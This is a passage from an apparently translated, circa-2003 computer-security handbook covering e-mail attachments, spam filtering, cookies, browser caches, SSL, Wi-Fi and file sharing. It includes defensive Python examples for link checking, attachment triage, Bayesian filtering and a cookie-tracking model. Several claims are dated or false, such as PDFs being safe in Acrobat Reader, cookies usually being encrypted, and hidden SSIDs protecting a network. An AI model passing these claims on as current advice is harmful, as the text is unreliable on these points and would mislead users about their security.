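        # connect to; its first field is what the reader mistakes for the site.
        result["decoy"] = parts.netloc.rpartition("@")[0].split(":", 1)[0]
        result["findings"].append("userinfo-before-@")
    try:
        ipaddress.ip_address(host)
        result["findings"].append("ip-literal-host")
    except ValueError:
        pass
    # If the visible text itself looks like a host name, it must match the target.
    shown = re.search(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", visible_text, re.I)
    if shown and bare_host(shown.group(0)) != bare_host(host):
        result["findings"].append("text-host-mismatch")
    return result


def scan_email_html(html):
    """Check every link found in an HTML e-mail body."""
    collector = AnchorCollector()
    collector.feed(html)
    collector.close()
    return [check_link(href, text) for href, text in collector.links]


if __name__ == "__main__":
    for item in scan_email_html(SAMPLE_HTML):
        print(item["real_host"], item["findings"])
```

A link with no findings is not proof that a message is genuine; the check only shows where a link leads and whether its presentation disagrees with that.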
Chapter Six
Security of Network Services

Overview

E-mail and the web are among the main uses of the Internet. In this chapter we explain in some detail how these services work and examine how their improper use creates insecurity. Wireless communications, file sharing and instant messaging are other sensitive topics related to network security that are addressed in this chapter.

Basic principles

You should regularly keep the security patches for your software up to date. Because security problems can harm you in many ways, the likelihood of being vulnerable increases when you connect to the Internet. If there is a security flaw in your operating system or application software, you can be sure that attackers know about it and use it to devise ways of breaking into your computer.

Rule four: Keep your operating system and important applications up to date.

Keeping up to date does not necessarily mean using the latest versions. Most companies and developers fix the security flaws in the versions that are in common use. Note that for free software this usually holds only for the latest available versions. This means that if you want to stay safe from security flaws you must regularly upgrade your software to its latest available version.

E-mail

Evolution

If you look at the history of the network (the past 10 to 30 years) you will see that at first e-mail was used only for sending text messages. Most systems that used e-mail relied on different methods for transferring files. The file-transfer methods were somewhat unfamiliar and hard to use. In the early days, when most e-mail users were technology specialists, this did not matter much, but as e-mail became more widespread it had to become simpler for the general public to use.

The problem was that early e-mail had been designed only to carry plain text (clear text), and files such as executable programs contained non-printing characters that could not be represented in plain text. The proposed solution was to encode non-printing information in such a way that it could be represented in plain text (more details on encoding are given in Appendix 1). In this method, after the message is received the encoded file is decoded and returned to its original form.

After that the concept of the "attachment" emerged, so that more kinds of files could be encoded. Today this newer method is called MIME (Multipurpose Internet Mail Extensions). As the use of attachments grew, e-mail programs changed so that they could open attachments automatically. The recipient of a message could thus view what had been sent without any extra effort.

At the same time the World Wide Web became common and used HTML to format web pages. HTML became one of the MIME encoding methods, which made it possible to format e-mails (changing fonts, colours, images and pointers to web pages). At present, e-mail programs also automatically execute the HTML instructions inside the pages that are sent.
The Impact of Enhanced Email
Adding these capabilities (formatting features) to email programs made them more useful. From then on users could easily exchange all kinds of files. With fonts, colours and images a message looked more attractive, and simple formatting could be done without a word processor. However, this enhancement also had negative aspects.
As mentioned earlier, before these advances nobody was directly affected by viruses and worms through email. Likewise, as long as you did not run a program received as an attachment to a message, you were safe from security risks. Now, however, programs that you receive can be run automatically, which means that they can direct you to a website where malicious actions, such as downloading malicious software, take place. In addition, special HTML commands can turn an attacker into the administrator of your computer; how this happens depends on the flaws in your computer's HTML interpreter.
Email Is Deceptive
Rule 5: Configure your email program so that it does not open attachments automatically.
Anyone who knows your email address, or can guess it, can send you a message with an attachment. That attachment may be useful and usable, or it may be a virus, worm or Trojan that can do serious damage to your system. Most recent email programs do not open attachments without your permission, but if yours opens them automatically, you should be able to disable that option.
Rule 6: Before opening any attachment, look carefully at its name to make sure that it is not an executable program.
Virus writers are very clever. They typically send attachments with names such as budget.xls.vbs. A viewer who does not know what vbs is assumes that an Excel file named budget has been sent to them from Microsoft (especially with settings in which the operating system does not show known extensions to the user); but the file is actually an executable Visual Basic program whose name is budget.xls: xls is merely part of the file's name and has nothing to do with Excel. In the worst case this program may be able to erase your system's entire hard disk.
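The name check that Rule 6 asks the reader to do by eye can also be done on the raw message before anything is opened. The following is an added example, not part of the handbook: it parses a constructed message and reports the real (last) extension of each attachment, whether a document extension is being used as a decoy in front of it, and what name a user would see if the operating system hides known extensions. The extension lists and the sample message are assumptions made for illustration.

```python
"""Attachment-name triage for Rule 6 (added example; all sample data is constructed)."""
import os
from email import message_from_bytes, policy
from email.message import EmailMessage

# Assumption: a non-exhaustive set of extensions that Windows runs or interprets
# when the file is opened. Adjust it for your own environment.
EXECUTABLE_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".exe", ".scr",
                   ".com", ".bat", ".cmd", ".pif", ".hta", ".lnk"}
# Document extensions that are typically placed in front of the real one as a decoy.
DECOY_EXTS = {".xls", ".doc", ".pdf", ".txt", ".jpg", ".gif", ".zip"}


def build_sample() -> bytes:
    """Constructed message: a decoy-named script plus an ordinary text attachment."""
    msg = EmailMessage()
    msg["From"] = "Accounts <accounts@example.com>"
    msg["To"] = "reader@example.org"
    msg["Subject"] = "Budget"
    msg.set_content("Please see the attached budget.")
    # The sender chooses both the file name and the declared MIME type.
    msg.add_attachment(b"' harmless placeholder, not a real script",
                       maintype="application", subtype="vnd.ms-excel",
                       filename="budget.xls.vbs")
    msg.add_attachment("meeting notes", filename="notes.txt")
    return msg.as_bytes()


def classify(filename: str, declared_type: str) -> dict:
    """Judge one attachment by its full name, not by what the mail client displays."""
    stem, real_ext = os.path.splitext(filename.strip())
    inner_ext = os.path.splitext(stem)[1].lower()
    real_ext = real_ext.lower()
    executable = real_ext in EXECUTABLE_EXTS
    return {
        "filename": filename,
        "real_extension": real_ext,
        "declared_type": declared_type,
        "executable": executable,
        # budget.xls.vbs: an executable extension hidden behind a document extension.
        "double_extension": executable and inner_ext in DECOY_EXTS,
        # What the user sees when the OS hides known extensions.
        "shown_if_extensions_hidden": stem,
        "action": "quarantine" if executable else "deliver",
    }


def triage(raw_message: bytes) -> list:
    """Parse a raw RFC 5322 message and classify every attachment in it."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    return [classify(part.get_filename() or "", part.get_content_type())
            for part in msg.iter_attachments()]


if __name__ == "__main__":
    for finding in triage(build_sample()):
        print(finding)
```

Note that the declared type of the first attachment says Excel while the real extension says script: both values are chosen by the sender, so only the final extension decides how the file will be handled when opened.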
In many cases the email address that appears next to "From" is not valid. This is a capability that spammers use to abuse your system. Sometimes, if you examine the full header, you may be able to work out where the message really came from and who sent it.
Rule 7: Never open an attachment sent to you by someone you do not know, unless you are sure that that type of file cannot contain malicious code.
How Can You Protect Yourself?
Remember that programs such as Microsoft Word (a word processor), Microsoft Excel (a spreadsheet) and all similar programs support macros, which can contain viruses. Even PDF files can contain malicious code fragments (although these files can be dangerous only when they are opened with Adobe Acrobat Professional; opening them with programs such as Adobe Acrobat Reader, which is more widely used, poses no particular risk). Using the user manual or the help pages, you can find out how to disable certain features (especially those that are rarely used on your system).
Rule 8: Never open attachments even from people you know and trust, unless you are sure that the person has checked the attachments and sent them to you with full consideration.
Your friend's machine may have a virus that, without your friend's knowledge, sends infected files to everyone in his or her address list.
Rule 9: Check the configuration of your email program to make sure that it does not process fancy HTML and does not send infected files to other computers.
This means that you may lose some of the decorative features of email, but in return you gain better control over what your email program does. Note that in some email programs you do not even have to open a message for the HTML code in it to run; displaying the message in the preview screen is enough for the code to run. Although an email message can contain HTML code, many browsers and email programs let you disable cookies, JavaScript and plug-ins for pages received as part of an email message.
Rule 10: Ask your ISP whether it checks email for viruses and similar threats before sending it.
Because worm and virus activity keeps increasing, most ISPs do this. Do not expect your ISP's filtering to be one hundred percent effective, but preventive action by ISPs can support your own security efforts. If your ISP is not aware of security issues, it is worth working with it to obtain safer service for yourself and its other customers. For example, you could give it a free copy of the book you are reading now!
Spam
Spam is the name used for unsolicited email, especially commercial messages sent in bulk by unknown parties, probably in the belief that the recipient will become interested in their products. In recent years the amount of spam has increased dramatically. In 2003 more than 50% of all email exchanged on the Internet was spam! Many people now receive about 10 spam messages for every legitimate message.
If spam carried a phrase such as "**SPAM**" in its Subject field, we could easily delete all of it. Laws that have been enacted provide that any unsolicited email sent by commercial companies is subject to legal prosecution. However, given the sheer volume of spam and the limited capacity of law enforcement, enforcing such laws is currently not very practical. Everyone needs a sensible way to recognise and delete spam without reading it or sending a warning to an overloaded complaints system.
More About Spam
To understand the problems that spam causes, three points must be considered:
a) How spammers obtain your address.
b) What counts as spam (in precise detail).
c) Why spammers send it.
a) Spammers have an opportunity to obtain your address if you have done any of the following:
• Sent a message or your signature to a public mailing list.
• Replied to a spam message, for example to ask to be removed from the recipient list.
• Posted to newsgroups.
• Registered through a web form for any reason and entered your address in it (even if you are quite sure that you are dealing with a reputable organisation).
• Used a computer on which an ident daemon was running (on many UNIX systems this identification program gives your user name to anyone who asks for it).
• Allowed your browser to store your address.
• Used instant messaging software.
• Put your email address on a web page, that is, allowed it to be visible to everyone.
• Registered a domain name for yourself, or listed your address with the technical support group of a website.
• Used email addresses that are easy to guess.
• Put your address on a system that has previously been broken into.
If any of these applies to you, there is a good chance that your address will be misused or even sold to spammers. In other words, if you use the Internet for any purpose, you may end up on spam recipient lists.
b) Some commercial messages are so numerous and so irrelevant that they are well recognised, and everyone knows they are spam. With other messages this is less obvious. In some cases whether a received email is spam depends on the recipient. The following examples help to make this clearer:
• Is an email containing information about facial care spam? Answer: yes, it is spam, unless you are a plastic surgeon and the email is an academic paper rather than a commercial advertisement.
• Is a call for papers for an academic conference on an obscure subject, sent to several mailing lists, spam? Answer: perhaps. Unless the subject happens to interest you and you would like to respond.
• If a company that sold you a product sends you and many other customers information about its next product, has it sent spam? Answer: no. But the spam filter at your ISP may spend a long time working out whether such a message is spam or not.
• If an email contains material that counts as spam by every definition, is it necessarily spam? Answer: yes, but only if it is the original that was sent. If, for example, the message was sent by a reader to the authors of this book and cites interesting examples of spam, it is certainly not spam and should not be filtered.
c) Why do spammers send spam? The simplest answer: because it works! If you examine spam you soon notice a pattern. Spam is usually about matters such as making or saving money, improving one's emotional or private life, and improving one's health. These subjects have one important thing in common: most of us have serious concerns about them, and some of us pay a great deal of attention to them. So even if only a tiny percentage of recipients follow up on these messages (for example, about 1 in every 100,000 recipients), spammers who send several million messages a day can make a lot of money this way.
What Should Be Done About Spam?
There are many ways to limit and control spam. Some governments have passed laws within their jurisdictions to prevent the spread of spam. Most ISPs consider the use of their facilities to send spam to be contrary to their service agreements. Passing such laws can be effective, but so far enforcing most spam-related laws has been very difficult and costly, and in many cases no enforcement mechanism has been devised for them.
Some major email users (such as companies) refuse to accept email that originates from ISPs that allow spammers to operate. This can be effective, because it forces ISPs to stop spam-related activity. However, this approach usually also harms innocent customers who send small amounts of email to various destinations. Many programs exist for detecting spam, deleting it or warning the recipient that a spam message has arrived. These programs can be run at the ISP's site or in the mail client. They examine the content of a message and where it was sent from; but because these criteria are hard to evaluate, the programs usually produce both false negatives and false positives.
False Negative
A false negative occurs when the scanning program declares that an email is not spam when in fact it is. This means that the program lets spam pass through the filter, which is why it is said that such a program may not be 100% effective.
False Positive
A false positive means that the scanning program declares some harmless messages to be spam. This causes a great deal of damage, especially if the message is deleted instead of delivered as a result. With false positives, ordinary harmless email may be lost and become unrecoverable.
The goal of spam scanning programs is to minimise false negatives and eliminate false positives. Unfortunately, reducing false negatives usually increases false positives. People who for whatever reason need to receive email that resembles spam may be harmed as a result. The most recently reported case involved a university newsletter that discussed spam. Because the newsletter contained examples of spam, scanners identified it as spam and a number of ISPs filtered and deleted it.
In addition to spam scanners, there are spam filtering methods that use challenge-response techniques. With this method, when a message arrives from an unknown sender it is held in transit (before the recipient opens it). A challenge is then sent to the sender asking them to confirm the message they sent, to prove that it came from that person and not from someone else or from a piece of software. The confirmation form is designed so that it cannot be handled automatically, and it is also not valid for later spam. If no confirmation is received within a few days, the message is deleted instead of being delivered. The problem with this method is that it requires manual intervention by the sender. If you send a message and are unable to respond quickly to the confirmation request, your message will not be delivered. Also, if two ISPs both use this service, they may never receive email from each other, because the first recipient does not see a message unless it has been confirmed, and the confirmation request will not be sent either, because its sender is unknown. Some spam filters place suspicious messages in a special folder instead of deleting them. You can then check the spam folder periodically to make sure that its contents are not victims of false positives.
A promising new anti-spam method is Bayesian filtering. With this method the filtering rules are refined by your own knowledge of spam. The rules can differ for each recipient. The aim is for the filter to learn from your behaviour, so that it can recognise the people you trust and reject content that is not normally identified as spam but for some reason does not interest you. Bayesian filters use linguistic techniques to let through messages containing particular words that, judging by your past email behaviour, are used in your genuine mail but rarely appear in spam. Bayesian filters are available for most email programs.
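The following added example (not from the handbook) shows both the per-user learning described in the Bayesian filtering paragraph and the false positive described earlier, where a university newsletter that quoted spam was itself filtered. It is a simplified naive Bayes model over word presence; the training messages, the newsletter text and the 0.8 threshold are constructed assumptions.

```python
"""Toy per-user Bayesian spam filter (added example; the corpus is constructed)."""
import math
import re
from collections import Counter

WORD = re.compile(r"[a-z]+")
THRESHOLD = 0.8  # assumption: messages scoring above this are treated as spam

# Constructed training mail for one hypothetical user.
SPAM = ["earn money fast from home",
        "cheap pills improve your health today",
        "save money on your loan act today"]
HAM = ["meeting agenda for the network security course",
       "lecture notes on firewall configuration attached",
       "your library book is due on friday"]
# Constructed stand-in for the university newsletter that quoted spam examples.
NEWSLETTER = "university newsletter examples of spam such as earn money fast and cheap pills"


class BayesFilter:
    """Naive Bayes over word presence, with add-one smoothing."""

    def __init__(self):
        self.docs = {"spam": 0, "ham": 0}
        self.seen_in = {"spam": Counter(), "ham": Counter()}

    def train(self, text: str, label: str) -> None:
        """Record one message the user has labelled 'spam' or 'ham'."""
        self.docs[label] += 1
        self.seen_in[label].update(set(WORD.findall(text.lower())))

    def spam_probability(self, text: str) -> float:
        """Posterior probability that text is spam, given this user's history."""
        log_odds = math.log((self.docs["spam"] + 1) / (self.docs["ham"] + 1))
        for word in set(WORD.findall(text.lower())):
            p_spam = (self.seen_in["spam"][word] + 1) / (self.docs["spam"] + 2)
            p_ham = (self.seen_in["ham"][word] + 1) / (self.docs["ham"] + 2)
            log_odds += math.log(p_spam / p_ham)
        return 1 / (1 + math.exp(-log_odds))

    def is_spam(self, text: str) -> bool:
        return self.spam_probability(text) > THRESHOLD


def build_filter() -> BayesFilter:
    """Train a fresh filter on the constructed corpus above."""
    f = BayesFilter()
    for text in SPAM:
        f.train(text, "spam")
    for text in HAM:
        f.train(text, "ham")
    return f


def demo() -> dict:
    """Show the false positive, then the effect of the user's correction."""
    f = build_filter()
    before = f.is_spam(NEWSLETTER)      # flagged: it quotes spam vocabulary
    f.train(NEWSLETTER, "ham")          # the user rescues it from the spam folder
    return {
        "newsletter_flagged_before": before,
        "newsletter_flagged_after": f.is_spam(NEWSLETTER),
        "real_spam_still_flagged": f.is_spam("earn cheap money today"),
        "ordinary_mail_flagged": f.is_spam("agenda for friday lecture"),
    }


if __name__ == "__main__":
    print(demo())
```

The correction also lowers the score of genuine spam that shares words with the newsletter (it stays above the threshold here, but only just), which is the trade-off between false positives and false negatives in miniature.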
If spam has become a problem for you, check whether your ISP offers spam detection and filtering. You should also check your email software to find out whether it can filter spam.
Using the World Wide Web
When this book was written in 2003, the web had been available to the public, with varying levels of access, for about 10 years. Today the web is essential for those who regularly use the network at work, at school and for leisure. Because the web has become such a useful and common tool, it has been forgotten that it can be a hostile environment.
Keeping Browsers Safe
In general the web is relatively safe, but using it also carries potential risks. Websites usually consist of static text and images, but they can also contain dynamic programs that are intended to run on your computer.
Rule 11: Do not allow websites to download and run malicious programs on your computer unless you trust the website completely.
Dynamic download of programs can sometimes be very useful. It lets you use online services, for example to scan for viruses and fix security problems. It also allows your software to be installed and updated easily, without the user having to carry out complex, technical, multi-step procedures.
Unfortunately, dynamic and automatic download of programs can also be dangerous and destructive. All browsers allow you to download and run JavaScript, Java and ActiveX programs and other programming tools on your computer, but if you want to be completely safe you should not permit these programs to run. Of course, once you disable these features you will find that many websites no longer work as they did.
Rather than blocking access to so many websites, look for a sensible solution:
• Enable relatively safe and common features such as JavaScript. This allows many websites to work correctly.
• Disable features such as Java and ActiveX, which are less safe and less commonly used, or set your browser to ask for your permission before using them. Disabling these features means that some browser functions will no longer work. Some websites may then warn you, and others may stop working. If you do not want this to happen, the browser must be able to recognise what the website needs and ask you whether to download and run the program required to view the site's content correctly.
Rule 12: Pay attention to the address of the website and to the address you are connecting to, and take care when viewing an unfamiliar website, especially if you have allowed that site to run a program on your computer.
Web browsers can be set to show the address of the website being viewed (this feature is usually called the Navigation Bar or Address Bar). When your cursor points to a link, the browser can show the address that the link points to (the status bar). By looking at that address you can see which other website you will be sent to, a site that may be untrustworthy or that you may not want to visit. In practice you may not want to check the Navigation Bar and Status Bar with every click, but when you are on an unfamiliar website, especially if you have enabled Java or ActiveX, you should use these tools so that you notice if you are redirected to a new website without intending it.
Cookies
A cookie is information that the browser writes to the computer's hard disk when you view a remote website. When you later view the same website again, your cookies are sent back to it. Each cookie belongs to the website it came from, although some browser bugs allow sites to see one another's cookies. A cookie reminds the website who you are, what your preferences are, and what you did on the site previously. For example, when you log in to a website with your user name and password, the site stores this information in a cookie on your computer. When you return, say, a week later, you may be logged in automatically on the basis of the information in that cookie. Cookies also allow websites to track what you have done during a session.
Although a cookie can normally be retrieved only by the website it came from, the site you are viewing may contain images and other objects that belong to a second website (called a foreign site or third-party site), and that second site can also store and retrieve cookies. Because images can be invisible, you may not notice at all that this has happened. These invisible images can be used for advertising purposes by tracking the websites you visit.
(Footnote 86: Suppose that sites A, B, C and D all display an invisible image from site Z. When the image is displayed in your browser, Z learns which site referred to it, and then stores cookies to remember which sites you visited. From then on Z has good information about what interests you and can use it to send you advertising.)
Rule 13: Check how cookies are stored on the computer. If you cannot control them (for example when you are using a computer in a public place), do not enter your private information on that computer.
All web browsers give you some degree of control over whether cookies are allowed. In some cases the browser can distinguish between cookies that are stored on your computer, cookies that disappear when the browser is closed, and cookies that are stored when you view websites and foreign websites. Essentially, you can allow all cookies to be stored, prevent them from being stored, or have the browser ask you before storing them. You are never told when the information stored in a cookie is sent back to the originating website.
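The scenario with sites A, B, C, D and Z can be made concrete with a small model, given here as an added example that is not part of the handbook. It shows what Z can record when the browser accepts third-party cookies, and what it records when the browser refuses them, which is the kind of control Rule 13 asks the reader to check. The host names, the `uid` cookie name and the single on/off browser setting are assumptions; real browsers have more detailed cookie policies.

```python
"""Model of the footnote's A/B/C/D and Z scenario (added example; hosts are made up)."""
import itertools
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

TRACKER_HOST = "z.example"
PAGES = ["http://a.example/health", "http://b.example/loans",
         "http://c.example/cars", "http://d.example/travel"]


class TrackerZ:
    """Site Z: serves the invisible image and logs who asked for it."""

    def __init__(self):
        self._next_id = itertools.count(1)
        self.profiles = {}  # visitor id -> hosts of the pages that embedded the image

    def serve_image(self, request_headers: dict) -> dict:
        """Handle one image request and return the response headers."""
        cookies = SimpleCookie(request_headers.get("Cookie", ""))
        response = {"Content-Type": "image/gif"}
        if "uid" in cookies:
            uid = cookies["uid"].value          # returning browser: same identifier
        else:
            uid = f"visitor-{next(self._next_id)}"
            response["Set-Cookie"] = f"uid={uid}; Path=/"
        # The Referer header tells Z which page embedded the image.
        page_host = urlsplit(request_headers.get("Referer", "")).hostname or "unknown"
        self.profiles.setdefault(uid, []).append(page_host)
        return response


class Browser:
    """Simplified browser with a single switch for third-party cookies."""

    def __init__(self, allow_third_party_cookies: bool):
        self.allow_third_party = allow_third_party_cookies
        self.jar = {}  # host -> SimpleCookie

    def visit(self, page_url: str, tracker: TrackerZ) -> None:
        """Load page_url, which embeds an image hosted on TRACKER_HOST."""
        third_party = urlsplit(page_url).hostname != TRACKER_HOST
        use_cookies = self.allow_third_party or not third_party
        headers = {"Referer": page_url}
        stored = self.jar.get(TRACKER_HOST)
        if stored and use_cookies:
            headers["Cookie"] = "; ".join(f"{k}={m.value}" for k, m in stored.items())
        response = tracker.serve_image(headers)
        if "Set-Cookie" in response and use_cookies:
            self.jar.setdefault(TRACKER_HOST, SimpleCookie()).load(response["Set-Cookie"])


def simulate(allow_third_party_cookies: bool) -> dict:
    """Visit sites A to D and return what Z has learned."""
    tracker = TrackerZ()
    browser = Browser(allow_third_party_cookies)
    for url in PAGES:
        browser.visit(url, tracker)
    return tracker.profiles


if __name__ == "__main__":
    print("third-party cookies allowed:", simulate(True))
    print("third-party cookies refused:", simulate(False))
```

With third-party cookies refused, Z still receives each Referer, but it sees four apparently unrelated visitors instead of one profile covering all four sites.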
Cookies can be inspected because they are in text format, but because the information in them is encrypted by the originating website they are usually not intelligible. Some browsers allow you to view and delete cookies, and there are third-party programs that also let you manage them.
If you want to control what a website knows about you, you must control when and how cookies are stored on your computer. Note that some websites need to store cookies on the user's computer in order to work properly. These sites generally tell you, when cookies are disabled, that they cannot perform or complete the operation.
If you use web browsers in public places (such as Internet cafés, libraries and schools), bear in mind that cookies containing your information are stored on those computers. In many cases the computer's administrator may not have given you enough access to control, view or delete cookies. Your information therefore stays on that computer and may be used by someone else who visits the same website. If you have logged in to a website and your credentials are stored in a cookie, another user who visits the same site may be logged in automatically as you. As a result, the website may make your stored information (such as your name, address and credit card details) available to that user.
This can be a problem even on a private computer that several people use. In these cases cookies are not only a privacy problem but also a security vulnerability.
The Web Browser Cache
When a browser retrieves a page or image from a website, it usually also saves a copy of the displayed page on the computer's hard disk. This collection of saved pages and images is called the "cache". If you view the website again and its page has not changed, the browser may not download the whole page again but instead use the cache to display it. In some cases web pages in the cache can also be viewed offline (that is, without an Internet connection). This means that everything you view in the browser has been stored on the computer's hard disk. So if you use the web for financial transactions, your purchase, credit card and bank account information will be fully readable and recoverable on that computer. Depending on how much you browse and how large the cache is, these pages and images can stay on the computer for varying lengths of time.
Rule 14: If your private information has been displayed on a web page, clear the cache when you have finished. If you cannot do so (for example when you are using a public computer), you should not use that computer to exchange confidential personal information.
All browsers allow you to clear the cache (called Temporary Internet Files) from the system, but many computers used in public places do not allow the cache to be controlled or deleted. Although clearing the cache after entering sensitive information is very important, so far no browser has put an icon on its toolbar that clears the cache with a single click.
Secure Transmission
All the messages you send and receive on the web are in clear text. This means that if someone can intercept them in transit, they will be able to read and understand them. If part of the Internet connection is wireless, or the ISP at the far end of the connection is not trustworthy, interception becomes easier and so deserves much more attention.
Browsers and web servers use encryption to solve this problem. Encryption alters the message so that it becomes very hard, or even impossible, for unauthorised people to read it (for more detail, see Appendix 1 of this Part). The encryption protocol is called "SSL" (Secure Socket Layer). You can use SSL for the messages you receive. Most browsers show a small padlock image that is open for ordinary transmission and closed for SSL transmission. In that case the page's URL begins with "https" instead of "http". If it is possible in your country, it is best always to use the strongest encryption method.
Note that the padlock does not indicate whether a message sent from you to the server is encrypted with SSL, but it is assumed that if the page that was sent is encrypted, the message going back is also transmitted in encrypted form.
SSL works only if the browser knows who it is talking to. This is achieved with the help of security certificates and digital signatures. In general, a web server that wants to be trusted must obtain a security certificate from a recognised certificate authority. If the authority is to do its job properly, it must verify that whoever requests a certificate is who they claim to be. The authority then digitally signs the certificate, and your browser stores tables for recognising these certificates.
Sometimes you receive a message from a website saying that its digital certificate has expired or belongs to a different location. The first case arises when the certificate's validity period has recently ended and the website has to go through the administrative formalities of renewing it. In the second case, too, the site has usually changed its name and the change has not been reflected in its certificate. Nevertheless, if you want a proper level of safety, in both cases you should end your connection with the site until the problem has been resolved in some way.
Is Secure Transmission Enough?
A small padlock has been designed for secure transmission on the web and shows that the transmission is secure. However, transmission is not the only thing that has to be examined to ensure security. Only a small percentage of fraud and identity theft results from insecure transmission. Most problems are things such as:
• lack of ethical standards at some websites;
• misuse of personal websites;
• misuse of personal computers.
The main exception here is "wireless transmission", which is discussed in the next section.
Privacy Policies
Many websites have a published policy (privacy policy) for protecting people's privacy. These policies set out what kind of information may be collected at the website, what may or may not be done with that data, and how the data must be protected. Every website that collects personal or financial information should have an appropriate, published privacy policy.
Wireless transmission
The use of wireless technology is growing in both developing and developed countries. It is usually cheaper than wired technology, is easier and faster to install on private premises, and has fewer regulatory problems. Wireless technology does, however, have two potential problems:
• Information may be stolen in mid-transmission.
• Transmission speed and quality may vary with location, weather, time of day, the proximity of radio equipment, line speed, installation quality and destructive interference.
Not much can be done about the second group of problems. They are characteristics of wireless technology and part of the price that has to be paid for using wireless communication. The way to counter interception is to use one of the various encryption methods (for more detail on encryption methods, see Appendix 1 of this part). If you have a server that supports encryption, be sure to use it (SSL-based websites, for example). If you use POP-based e-mail, you should choose the APOP option so that passwords are encrypted before they are sent. This feature provides end-to-end security, independent of the transmission medium. If the server does not use encryption, you should be aware of the technology's limitations and, where necessary, decide how you are going to use the connection.
802.11 or Wi-Fi
802.11 is a set of evolving IEEE standards for wireless local area networks (wireless LANs). 802.11, usually called Wi-Fi (Wireless Fidelity), has become popular as a replacement for wired Ethernet for connecting home computers and laptops; its advantages are its low cost and its relatively high speed.
Unfortunately, most Wi-Fi implementations have several vulnerabilities:
• Base stations do not have a secure, reliable connection with one another.
• If you want to share your network connection with someone else, you should change your network name (SSID) from its default and configure it so that the name is not visible to unauthorized people. Once this is done, only people who know the SSID will be able to see that network connection.
• Its encryption algorithm (WEP) is weak and can easily be broken. Even so, in the absence of better methods you can enable it. Bear in mind that if someone really wants to examine the information you transmit (a password, for example), relying on this method leaves you very vulnerable. There is, however, a new encryption method (WPA) that fixes the shortcomings of WEP and is available in newer equipment. Its use in Wi-Fi networks is strongly recommended.
Mobile phones
Mobile phones (also called handheld or cellular phones) are widely used for voice transmission and can sometimes also be used for data transmission. Many mobile phone technologies can be eavesdropped on and intercepted, and are therefore not secure.
Long-haul links
Long-distance links, especially to remote areas, are usually provided with wireless technologies. These links can serve several users at the same time. If the transmission is direct (using dish or Yagi antennas), eavesdropping will be difficult without special equipment. Where necessary, these links can be encrypted using cryptographic hardware.
Local loop wireless telephones
This technology is used in homes and offices in many countries. It allows telephone lines to be installed cheaply and without faults, and it does not have the problems of wired infrastructure equipment. Unlike copper wire, wireless equipment cannot be stolen along the route and sold; but, like wired telephones, when a modem is connected to these lines they can carry other kinds of data instead of voice. Wireless technology may be open to eavesdropping. Depending on your location, national law and local regulations, you can ask your ISP to check on encryption of the link.
Other Internet issues
File sharing
Where there is more than one computer, shared files are one of the most important and most useful tools available on a network. In the simplest case, this feature lets you, while working on one system, access files on another system, change them, create new files on that system, or delete files that exist there. The two systems may be in the same room or in different hemispheres. File sharing makes it possible to reach the files on your own computer while you are travelling.
A single computer acting as a file server can be regarded as the hard disk of a large number of computers. In that case most of your files are kept on the file server and you reach them over the network.
The obvious vulnerability here is that if you can reach your files remotely, other people can do so too. A lesser vulnerability is that if you share files with others, you are not safe from the vulnerabilities that may affect their computers. For example, if a computer that has access to your files is infected by a virus, your files may be infected as well.
Rule Fifteen:
If you do not use file sharing, disable it. If you do need it, limit your access to what you really require.
Rule Sixteen:
If you use file sharing, use strong usernames and passwords and restrict access permissions to the minimum with which you can still do your work.
Rule Seventeen:
If you share files with others, make sure that they take security seriously.
File sharing and remote access features let you use usernames and passwords for access control, and usernames and passwords let you control what a user does (reading, writing, creating and deleting). Many systems can control everything a user does. For example, you can restrict a remote access facility so that it only allows files to be read. In other words, if you do not need write access, you should disable it.
Systems that support some form of file sharing can also share printers. Although remote access to a printer is not especially risky, it is better to disable it unless it is necessary. There may be a flaw in remote printer access that allows permissions issued specifically for print jobs to be used for malicious actions.
Instant messaging
Instant messaging makes it possible for a message typed on one computer to appear simultaneously on other computers. Unlike e-mail, it requires the sender and the receiver both to be connected to the network at the same time. There are various instant messaging programs. Among them are MSN Messenger, IRC (Internet Relay Chat), Yahoo Chat, AIM (AOL Instant Messenger) and ICQ (an abbreviation of "I Seek You").
Internet communication services such as AOL, MSN, Yahoo, online game hosts and so on each have their own Messenger and Chat. Some of them exchange information with the others and some do not.
Many instant messaging systems let the user choose a name that is displayed with the messages they send, so that others can also send messages to them. These names may keep your real identity hidden, although the system administrators may be able to identify you through your IP address.
Rule Eighteen:
Instant messaging can be very useful, but use it with full awareness and care.
Instant messaging is useful for several reasons:
• It is easier and faster to use than e-mail and has almost no delay. This makes conversations held over it more practical than exchanges of e-mail.
• While you are busy with something else, messages are received and sent in a small window on your screen and do not interrupt your other work very much.
• You do not need to reveal your e-mail address (and identity) to the other participants in instant messaging conversations.
In particular cases instant messaging is preferable to e-mail. Some people also regard it as safer, because the messages are not copied to other places on disk, whereas with e-mail they are. Nevertheless, users are still warned that their instant messages may not be secure. The main problem with messaging systems is that some of them can also transfer files. This exposes them to the same problems as other file-sharing features, such as e-mail attachments. Some instant messaging systems also allow commands to be executed remotely, and this can lead to an attack.
Unnecessary active services
Operating systems and applications are very powerful and capable. In most cases an ordinary user does not need all the features the software offers. Services that are not needed should be disabled. Unfortunately, some software vendors enable every feature of their programs and leave it to the user whether to use them or not, and in most cases the user is not even aware that these services exist. For example, for several years in a row some UNIX systems were designed so that any machine running them could act as an unrestricted e-mail hub (unless the user disabled the feature). This allowed spammers to use these machines to distribute spam without many of the machines' owners knowing that such a capability existed.
Rule Nineteen:
Disable all Internet services that you do not need and seldom use.
Software vendors are becoming increasingly aware of the problems. So, despite their interest in developing and selling systems with many capabilities, they release their programs with the ancillary services disabled, and the user can enable each of them when needed. It is very important that services which are not in particular use are disabled. Such services include file and printer sharing, web servers, e-mail servers, File Transfer Protocol servers (FTP servers), Remote Procedure Call servers (RPC servers), and so on.
Chapter Seven
Tools for Improving Security
Overview
This chapter looks at security software packages and at ways of increasing the security of networks and computers. Security software packages here means virus scanners, firewalls and remote access tools.
Virus scanners
Virus scanners protect your computer from known viruses, worms and Trojans in the following ways:
• Whenever you access a file, or copy, save, move, open or close it, they stop viruses from harming the system.
• Whenever you insert an external disk into your machine, they check it for possible viruses.
• Whenever an e-mail message is received, the message and its attachments are checked to make sure they are free of any kind of virus.
• Whenever a file is downloaded from a website, it is checked.
• In most cases, when a web page and the software embedded in it are downloaded to your computer, they are checked.
• With these programs you can scan a single file, a set of files, or every disk present for viruses.
